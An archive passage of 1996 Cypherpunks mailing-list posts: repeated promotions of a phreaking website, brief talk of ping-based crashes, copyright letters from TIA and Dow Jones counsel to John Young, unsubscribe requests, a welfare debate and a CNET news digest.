Message-ID: <19461D17FCF@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19461DB0F5C@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <19461DC04B9@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing
Message-ID: <19463AC689F@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19463AE2DCB@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: testing new Home Web site
Message-ID: <19463AD699A@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


try this site and tell me how you like it
if you dont like it then message Mr.Angry on that page
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phiberelic Phreaker" <scholars.bellevue.edu@ns.ccsn.edu>
Date: Tue, 3 Dec 1996 13:13:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: test new web site
Message-ID: <19463AF28C7@scholars.bellevue.edu>
MIME-Version: 1.0
Content-Type: text/plain


look at my page and tell me how you like it
if you dont like it please tell Mr.Angry , just click on the un happy 
face on that page for a quicker reply
        PhReAkInG iS a ViOlEnT pOiSoN. iT cAnNoT Be ApPlIeD 
eXtErNaLlY tO aNiMaL oR hUmAn TiSsUe WiThOuT sErIoUs InJuRiOuS 
rEsUlTs. It CaNnOt Be TaKeN iNtErNaLlY wItHoUt InDuCiNg VoMiTtInG, 
bLiNdNeSs, AnD GeNeRaL pHySiCaLlY uLtImAtElLy ReSuLtInG iN dEaTh.
       PhReAk ThE pLaNeT--http://www.angelfire.com/ne/PhreakThePlanet/index.html
       PhIbErDeLiC PhReAkEr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 4 Dec 1996 22:58:20 -0800 (PST)
To: "ichudov@algebra.com>
Subject: Re: IP address
Message-ID: <19961205065535453.AAA200@rn215.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Dec 1996 04:38:46 -0600 (CST), Igor Chudov @ home wrote:

>> >What is the risk of publishing your dynamic IP address to a web page while you are on line?  How vulnerable is >> >someone just connected to the internet, w/o any server running? What attacks are feasable? --Internaut

>> Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) your
>> machine can be locked up or rebooted at *any* time using just PING!

>Isn't is Unix that is actually vulnerable?

Actually, it anything from Windows systems to Unix boxes to routers to
printers to firewalls, etc can be vulnerable..!

I know that linux got a patch out in 2 hours 35 minutes 10 seconds and that
OS/2 hasn't been vulnerable since 1990 or so, but that's just because I use
those systems.  Check http://www.sophist.demon.co.uk/ping/ for details on
your system.

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Napalm <sfnf9uy@scfn.thpl.lib.fl.us>
Date: Tue, 3 Dec 1996 13:34:30 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Subject: AOL
In-Reply-To: <Pine.SUN.3.95.961202160253.1502N-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.95.961203163136.10274B-100000@scfn>
MIME-Version: 1.0
Content-Type: text/plain


Whats the deal here? did those idiots really knock off that $3.00 /hour
thing? That would rule.

 L8R	-Napalm					SFNF9UY@SCFN.THPL.LIB.FL.US





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Tue, 3 Dec 1996 08:27:49 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <32A3BBD6.1ECA@gte.net>
Message-ID: <199612031627.RAA21581@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I made note to this list time and time again requesting that people not
> state the obvious - who owns what hardware and what rights they have to
> pull the plug or whatever.  I seriously doubt that even the least
> intelligent cypherpunk would misunderstand such a thing. Do you really
> believe that myself and other cypherpunks want to "seize" John's equip-
> ment, morally or otherwise?  You are correct about certain issues being
> complex, but one of the big failings of the crowd who supported Gilmore
> on this action was their failure to understand the point I've made here -
> that we *do* understand basic property rights, etc.


Ah.  Then we are in agreement here.  My "Rule" in the House
Rules etc. simply stated the obvious fact, for the benefit of 
those who need it stated, of Gilmore's sole authority over the 
physical substrate.  I vaguely recall some subscribers implying
or stating otherwise during the vanish Vulis fracas.  It would
not at all surprise me if some people disagreed with this
simple premise--  they habitually do so with regard to "public"
establishments like bars and restaurants, and it isn't much of
a stretch to start thinking of cypherpunks as a similarly
"public" institution.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqRVAUjbHy8sKZitAQFRMgL/UTIlPbTu2Z8sIIKLX4wkLWS23WCrVmDr
R7PVfovgZgIYoJYPAwtRxrqqQxOJtaS2SAMIItbDtGA1jG75q5GlxeS/wg303NbE
f9gX1Ok0vjbfGiyC/lyf58DJfJ6FUDal
=kkrb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Dec 1996 14:45:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: TIA Counsel Writes
Message-ID: <1.5.4.32.19961203224026.00686724@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Fax header: Dec 03 '96 03:57PM  D'Ancona &Pflaum 

D'Ancona & Pflaum, Suite 2900, 30 North LaSalle Street,
Chicago, Illinois. Telephone (312) 580-2000. Fax (312) 580-
0923

By Certified Mail
Return Receipt Requested
and by Fax (212) 799-4003

Mr. John Young 
251 West 89th Street Suite 6E 
New York, New York 10024

Dear Mr. Young:

I am writing to you as general counsel of Telecommunications
Industry Association ("TIA") which, as you may know, is
engaged in the formulation and publication of standards in
the communications field. At the request of our client, on
November 26, 1996, I accessed your WEB site and both viewed
and printed out a list of links to documents dealing with
encryption. Among them were documents described as a CAVE
Report, CAVE Table and a CAVE Algorithm dated November 20
and November 21, 1996.

In this fashion I was also able to view and print out the
algorithm document of TIA's Committee TR45.3, with a clear
statement that the information in the document may be
subject to the export juristiction of the U. S. Department
of State under the applicable regulations.

The posting on the WEB site of these documents is, in our
opinion, a violation of the copyright of TIA and unlawful.
Furthermore, the posting of the algorithm may constitute a
violation of applicable export regulations. It seems in any
event that it will be a violation under regulations to be
drafted pursuant to the President's Executive Order of
November 15, 1996 which was also accessed by me on your WEB
site.

I returned to the site last Friday and yesterday, December 2
and noticed that these documents are no longer there. I
commend you removing them, but ask for your assurances that
they will not be posted again. In addition, it is important
that we know how you received this documentation which is
strictly restricted in its circulation.

I would appreciate hearing from you at your very earliest
convenience.

Sincerely,

Paul H. Vishny

To:   Susan Hoyler [TIA] by fax (703) 907-7727
To:   Eric Schimmel, c/o Wyndham Bristol Hotel - Dallas, by
      fax (214) 761-7520

----------

Mr. Vishny and I spoke about his fax. I said that the CAVE-
related documents would not be reposted on my Web site, and
that TR45.3 had come by anonymous mail, as have others we've
published. Mr. Vishny said TIA intended to take no action on
this matter but its members must abide NDA.

Don't know what the Feds will do with Susan Hoyler's
notification about TR45.3. Along with several telcomm biggies
some Ft. Meade servers siphoned TR45.3 and most other files 
on the site -- several times. Well, well!

WSJ also remonstrated yesterday; we'll share that thank-you 
separately.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 3 Dec 1996 17:35:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Copyright violations
In-Reply-To: <19961203.110728.12095.0.alzheimer@juno.com>
Message-ID: <961203.174512.3H7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, alzheimer@juno.com forwards:

> Washington Post: Monday, December 2, 1996
>  
> Folks Who Welcome Charge Cards

Hey, Ronnie...  if you're going to run this stuff through the cp list,
at least break it into separate articles so I can skip through it
easier.

[ now back to your regularly scheduled flamewar ]
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
"There are two major products that came out of Berkeley:
LSD and UNIX.  This is no coincidence."
            -- glen.turner@itd.adelaide.edu.au (Glen Turner)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMqS8BBvikii9febJAQGO4wP9HEVLPuUrUAwPY+p6iZ9RRrfYjvRE3xap
E3hJqjUrI8L56Yb+vst8ePYyCRhinYpDZgiQut5SmFsffvwTi4ZRDSZ+Fi0oizjE
Lkxj6xq7FaRYvCrzXEOkOd7Nk9ncEBKnt7vjLtW2N8ICSi3ESjWkelqpi/QksTyr
ZzKrEJ6VpAU=
=9ot2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angel Luis Ortiz Ruiz <zeen@caribe.net>
Date: Tue, 3 Dec 1996 13:46:24 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: (no subject)
In-Reply-To: <Pine.SUN.3.91.961202223007.24305E-100000@crl5.crl.com>
Message-ID: <32A49FBD.7342@caribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> 
> On Tue, 3 Dec 1996, Javier Rivera wrote:
> 
> > unsuscribe cypherpunks
> >
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                       SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> Friend,
> 
> It is impolite and counter-productive to spam a list asking
> or demanding how to get unsubscribed.  In the future, if you
> do not know how to get off a list, ask ONE person on the
> list for help.
> 
> To get off Cypherpunks:
> 
> 1) Address an e-mail message to:  majordomo@toad.com
> 
> 2) In the message body write:     unsubscribe cypherpunks
> 
> You will be removed soon thereafter.
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	Friend: Thank's for your asnswer but I already do that. The server say
that I'm not in the list but I still reacive the messages. Thankx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Tue, 3 Dec 1996 17:48:55 -0800 (PST)
To: Jeff Ubois <jubois@netcom.com>
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <2.2.32.19961203024102.008bd390@netcom.com>
Message-ID: <Pine.LNX.3.95.961203174456.15900B-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


I hardly want to be known as the champion of welfare, despite my recent
posts ;-( I wonder, however, if these figures are to some large extent a
result of health care benefits (presumedly) being paid for whereas
ordinary folk in the states do not get such access.

Assuming these figures are accurate, there does appear to be a problem!
While I do believe that most people would rather work than not, there
really should not be any financial incentive to chose welfare over
honest work. FWIW, I don't *believe* these figures are representative of
Canadian welfare roles as we all get (more or less) free health care to
begin with, something I and most Canadians are proud of.

(Once again, I am back on cypherpunks talking about non-crypt related
subjects. This is my last public posting on this subject.)

cheers, kinch


On Mon, 2 Dec 1996, Jeff Ubois wrote:

> Date: Mon, 02 Dec 1996 18:41:02 -0800
> From: Jeff Ubois <jubois@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Culling the proles with crypto anarchy
> 
> The numbers quoted in the press were based on a study by the Cato Institute,
> "The Work Welfare Trade-Off: An Analysis of the Total Level of Welfare
> Benefits by the State" by Michael Tanner, Stephen Moore, and David Hartman,
> September, 1995.  It's at 
> <http://www.cato.org/research/pr-nd-st.html>.  
> 
> Extracts: 
> 
> * To match the value of welfare benefits, a mother with two children would
> have to earn as much as $36,400 in Hawaii or as little as $11,500 in
> Mississippi.
> 
> * In New York, Massachusetts, Connecticut, the District of Columbia,
> Hawaii, Alaska, and Rhode Island, welfare pays more than a $12.00-an-hour
> job--or more than two and a half times the minimum wage. 
> 
> * In 40 states welfare pays more than an $8.00-an-hour job. In 17 states
> the welfare package is more generous than a $10.00-an-hour job.
> 
> * Welfare benefits are especially generous in large cities. Welfare
> provides the equivalent of an hourly pretax wage of $14.75 in New York
> City, $12.45 in Philadelphia, $11.35 in Baltimore, and $10.90 in Detroit.
>             
> * In 9 states welfare pays more than the average first-year salary for a
> teacher. In 29 states it pays more than the average starting salary for a
> secretary. In 47 states welfare pays more than a janitor earns. Indeed, in
> the 6 most generous states, benefits exceed the entry-level salary for a
> computer programmer.
> 
> 
> At 01:27 AM 12/3/96 -0800, Timothy C. May wrote:
> >At 4:06 PM -0500 11/27/96, Clay Olbon II wrote:
> >>At 12:46 PM 11/27/96 -0800, Dave Kinchlea <security@kinch.ark.com> wrote:
> >
> >>>I am not in a position to argue with you, I simply don't have the facts.
> >>>My question is, do You? can you cite where this figure came from, it
> >>>sounds like Republican rhetoric to me. Of course, I will point out, that
> >>>minimum wage is simply not enough to feed a family. It is (or at least
> >>>it should be) reserved for single folks just starting out.
> >>
> >>Can't give you the exact date, but it was an article in our local paper (The
> >>Detroit News).  The $10 figure is not exact, as the actual number varies
> >>from state to state, I remember that number as being about average.
> >
> >I can confirm the gist of Clay's point: I saw a table listing "effective
> >hourly welfare pay" for the 50 states and D.C. This was in the "San Jose
> >Mercury News," at least 8-10 months ago (and presumably elsewhere, as it
> >was a major story). I used it in one of my articles, and gave the reference
> >then (sorry, not handy, and my own welfare rate does not pay me enough to
> >spend hours sifting through past articles for something so minor, an old
> >cite, that is).
> >
> 

Key fingerprint =  CE 54 C3 93 48 C0 74 A0  D5 CA F8 3E F9 A3 0B B7 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Dec 1996 15:19:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dow-Jones Counsel Writes
Message-ID: <1.5.4.32.19961203225226.006a479c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


---------

Date:    Mon, 2 Dec 1996 11:15:07 -0500
To:      jya@pipeline.com
From:    legalwfc@wsj.dowjones.com 
         (Legal Department - Dow Jones & Co. NYC)
Subject: Articles on Your Web Site


Hello.

I am an attorney with Dow Jones & Company, Inc.  I came
across your Web site recently and saw that you have 
incorporated articles from The Wall Street Journal, which 
is a publication of Dow Jones.  Dow Jones is pleased that 
readers find information in The Wall Street Journal important 
enough to communicate to other Web users.  The articles I've 
seen are, or have been, located at

   http://jya.com/clash0.txt;
   http://jya.com/xpanix.txt; 
   http://www.jya.com/peanut.txt; 
   and http://www.jya.com/boomer.txt.


We also appreciate your encouraging others to take a look
at our articles.  The problem is that posting our copyrighted 
material at your site violates copyright laws, even if you give 
us credit, and even if you don't charge people to read the 
posted material.  The same would be true if someone were to 
republish material that you created without your permission. 
You can, of course, recommend stories from The Wall Street
Journal at your site by citing the headline and the date of 
the article and providing a brief description.  And those 
articles can be viewed quite easily for a modest subscription 
fee in The Wall Street Journal Interactive Edition, the Web 
site of The Wall Street Journal (http://wsj.com).

While we hope you keep reading The Wall Street Journal, you
must remove our articles from any Web site you control as 
soon as possible.

If you want to talk to me about this, you can reach me at 
(212) 416-3108.

Many thanks.

Sincerely,

Hunter Farrell
Counsel
Dow Jones & Company, Inc.

---------

We thanked Mr. Farrell for his courteous note, promised 
to keep WSJ articles off our site and read the paper.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Javier Rivera <zeen@caribe.net>
Date: Tue, 3 Dec 1996 13:59:39 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: (no subject)
Message-ID: <32A4A305.6769@caribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> 
> On Tue, 3 Dec 1996, Javier Rivera wrote:
> 
> > unsuscribe cypherpunks
> >
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                       SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> Friend,
> 
> It is impolite and counter-productive to spam a list asking
> or demanding how to get unsubscribed.  In the future, if you
> do not know how to get off a list, ask ONE person on the
> list for help.
> 
> To get off Cypherpunks:
> 
> 1) Address an e-mail message to:  majordomo@toad.com
> 
> 2) In the message body write:     unsubscribe cypherpunks
> 
> You will be removed soon thereafter.
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        Friend: Thank's for your asnswer but I already do that. The
server say that I'm not in the list but I still reacive the messages.
Thankx again!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Fairbanks <apf@ma.ultranet.com>
Date: Tue, 3 Dec 1996 16:21:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199612032327.SAA04610@lucius.ultra.net>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@ai.mit.edu>
Date: Tue, 3 Dec 1996 17:51:41 -0800 (PST)
To: "Cypherpunks (E-mail)" <cypherpunks@toad.com>
Subject: Anyone considered adding crypto into Microsoft Outlook?
Message-ID: <01BBE14A.04580F10@crecy.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

	I've been playing around with the new beta of office '97. The main addition is a pretty nice integrated calendar, task list, address book and email doobrie. 

	It just struck me that it would probably make the most convenient platform for integrating cryptography. After all MAPI is an open, extensible API allowing ready access to the email "hooks" necessary. The integration of an address book with the email system makes it very easy to add public key information into a person's entry.

	I'm not sure whether PGP or MOSS would be the most compatible format. Its quite possible that S/MIME would be more appropriate. 

	It seems to me however that the main thing stopping the use of crypto has been the pretty weedy interfaces. I'm afraid the MH hacks just don't cut it. It seems to me that a downloadable plug-in would be very popular. I know a lot of lawyers who would jump at the chance to use email but realize they have to have crypto.

	The main problem so far seems to be the impenetrability of the MAPI documentation. Does anyone know of a usable reference or which of the gazillion Microsoft Developer network CDs one can find more information?

		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Dec 1996 16:19:20 -0800 (PST)
To: cypherpunks <dcsb@ai.mit.edu>
Subject: Dec 3rd, discussion.
Message-ID: <Pine.SUN.3.94.961203184533.2277N-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I want to thank the members of the DCSB and other attendees for the forum.

Unfortuantely, I have to include an apology.

I managed to run significantly over time, and missed the chance to deal
with many of the more interesting subjects.  (My own fault in that I
thought I had one more hour than I did).

I hope the discussion was intersting to the attendees in any event.

I will be posting a paper outlining the subject matter in some detail
presently.

In any event, I'd like to thank those present once again.
It was a pleasure.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Tue, 3 Dec 1996 19:39:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRIVACY: X-No-Archive and mail.cypherpunks
Message-ID: <Love@22843>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home <ichudov@algebra.com> writing [ 1422] bytes in <$m2n26165-.199612031615.KAA03400@manifold.algebra.com> said:

> This is primarily addressed to the person who supports cypherpunks
> mail-to-news gateway. If you know who such person is, please send
> his/her address to me.
> 
> Please modify your reposting program so that it does not remove the
> 
> 		X-No-Archive: yes 
> 
> header line from email messages. This particular header line is an
> indication to USENET search engines that the author of the message would
> not like it to be stored in these engines. It preserves the author's
> privacy and enforces the copyright protection.
	
	"X-No-Archive: yes" is for idiots.  Who wants to censor
	their own posts?

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 20:04:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Just call the police"...yeah, right
In-Reply-To: <Love@22825>
Message-ID: <v03007801aecaa897a813@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 PM -0800 12/3/96, Troy Varange wrote:
>	Well, the "danger" of posting a static IP must be even
>	greater than with a temporary IP.
>
>	Just call the police if you uncover a bonafide case of a
>	denial of service attack.  From what I gather, they take
>	this shit seriously, and have better capacities of
>	getting lazy admins to reveal the relevent data in their
>	logs.

Saying "just call the police" strikes me as being one of the most absurd
things I've ever heard on this list.

(If I receive a "Logos-gram" warning me I am being unpolite, you know where
it'll go.)

99.7% of all local police departments will say, "Huh?" Then they will ask
what an "IP" is, then they will advise the caller to deal with it in civil
court, and hang up.

Most police departments seem to have a hard time using their 8086-based PCs
to run WordPerfect, and have almost no contact with the Internet.

If your local cops are prepared to deal with a subtle attack involing IP
pings, or whatever, they all I can say is that you must live in the nerd
capital of the world....actually, I thought Silicon Valley was that place,
and I know for sure that the local police aren't prepared to handle obscure
attacks.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Tue, 3 Dec 1996 20:34:41 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: NEWS.COM DISPATCH December 3, 1996
Message-ID: <199612040411.UAA09486@cappone.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


***************************************

CNET's NEWS.COM DISPATCH
Tuesday, December 3, 1996
San Francisco, California, USA

***************************************

WELCOME!

***************************************

The NEWS.COM DISPATCH highlights the up-to-the minute technology
news presented by NEWS.COM. It tempts readers with coverage of
today's hottest stories, news in the making, (in)credible rumors,
and other indispensable information.

For complete versions of the stories updated all day long, head
over to:

   http://www.news.com/?nd

***************************************

CONTENTS

SCOOPS AND TOP STORIES
       January trading often a microcosm of year to come
       It's not just an online ad--it's a purchase order, too
       Chasing Gates, Oracle's Ellison finds someone chasing him
       Sybase finds a sugar daddy, and the market responds

ANNOUNCEMENTS
       An easy way for you to customize NEWS.COM
       Late-breaking stories just a click away with Desk Top News
       Send us your questions, comments, flotsam, and jetsam
       Search the site for particular topics and articles
       How to subscribe and unsubscribe

***************************************

SCOOPS AND TOP STORIES


JANUARY TRADING OFTEN A MICROCOSM OF THE YEAR TO COME
For 40 of the last 45 years, all bear markets began or continued
with losing or below-average Januarys, while the best market years
all had above-average Januarys. In today's Perspectives feature,
California Technology Stock Letter Editor Michael Murphy analyzes
what trends investors should look for during this bellwether
month.

   http://www.news.com/Perspectives/perspectives.html?nd


IT'S JUST NOT AN ONLINE AD, IT'S A PURCHASE ORDER TOO
File under: "Oh, so THAT'S where all the money is going to come
from." Ted Leonsis of AOL predicts that a revolutionary breed of
transaction-enabled advertisements will bring billions of dollars
in ad revenues to the Net in the near future. He also opines that
these new hybrids will make today's "banners and buttons" obsolete
by 1998.

   http://www.news.com/News/Item/0%2C4%2C5872%2C00.html?nd


CHASING GATES, ORACLE'S ELLISON FINDS SOMEONE CHASING HIM
Larry Ellison, who has portrayed himself as a Microsoft-slayer
with his vaunted vision of the Network Computer, is himself facing
a challenge, this time on Oracle's traditional home ground.
Informix's Phil White is hoping that his new product will make his
company the king of the database hill.

   http://www.news.com/News/Item/0%2C4%2C5867%2C00.html?nd


SYBASE FINDS A SUGAR DADDY, AND THE MARKET RESPONDS
Although formerly number-two database maker Sybase has suffered
three consecutive quarterly losses, things might finally be
looking up for the troubled firm. The company's stock, which had
been virtually flat for more than a month, rose in response to the
news that renowned financier George Soros was bringing in the
cavalry.

   http://www.news.com/News/Item/0%2C4%2C5870%2C00.html?nd


***************************************

ANNOUNCEMENTS


AN EASY WAY FOR YOU TO CUSTOMIZE NEWS.COM
So many bits, so little time? Sounds like you need Custom News.
Identify the topics, keywords, or sections you're most interested
in, and Custom News will a create a page of headlines and
summaries for all stories that match your criteria. Check it out
at:

http://www.news.com/Personalization/Entry/1%2C21%2C%2C00.html?nocache=1


